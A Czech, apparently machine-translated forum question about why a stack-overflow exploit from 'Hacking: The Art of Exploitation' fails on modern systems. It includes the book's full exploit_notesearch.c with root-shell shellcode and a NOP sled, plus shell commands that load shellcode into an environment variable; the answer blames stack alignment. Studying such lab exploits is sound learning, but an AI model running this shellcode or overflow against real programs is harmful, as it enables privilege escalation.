Proč to nejde shellcode provést?

0

Otázka

Pracuji přes Hacking: Umění Využívání a běžím do mé první zádrhel se snaží dostat známou funkční exploit spustit z knihy prostřednictvím proměnné prostředí. Všechny programy byly sestaveny s -fno-stack-protector -zexecstack -no-pie -fno-pie.

Běží exploit_notesearch.c (i když s velmi specifickými offset), byl jsem schopen se dostat exploit pop shell pohybem kompenzovat s argv[1]. To funguje na moderních Os (s ASLR zdravotně postižené), stejně jako LiveCD součástí knihy.

notesearch.c

exploit_notesearch.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=208;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}

Dále v této kapitole, jsme se nastavit shellcode k proměnné prostředí a pokus o přesměrování toku na místo na zásobníku, kde SHELLCODE proměnná prostředí je nastavena, v půli cesty přes předřazen NOP sled. Nicméně, to nikdy spustí využít na moderní operační systémy, ale funguje v pohodě v Ubuntu 7.04 live CD, které přišlo s knihou. shellcode.bin je shellcode v horní části exploit_notesearch.c soubor běžel s echo -en a přesměrován do souboru.

$ export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat shellcode.bin)
$ ./notesearch $(perl -e 'print "\x17\xf2\xff\xbf"x40') # Address halfway through NOP sled

To, co se tady děje, že se změnilo mezi staré operační systémy a moderní? Je tam ochrana nejsem si vědom, že brání koni NOP sled k shellcode?

Děkuji.

c environment-variables shellcode
2021-11-24 04:34:00
1

Nejlepší odpověď

0

Problém byl stack alignment, sestavování s -mpreferred-stack-boundary=2 zarovná stack podobně jako kniha.

2021-11-24 15:24:48

V jiných jazycích

Tato stránka je v jiných jazycích

Русский
..................................................................................................................
Italiano
..................................................................................................................
Polski
..................................................................................................................
Română
..................................................................................................................
한국어
..................................................................................................................
हिन्दी
..................................................................................................................
Français
..................................................................................................................
Türk
..................................................................................................................
Português
..................................................................................................................
ไทย
..................................................................................................................
中文
..................................................................................................................
Español
..................................................................................................................
Slovenský
..................................................................................................................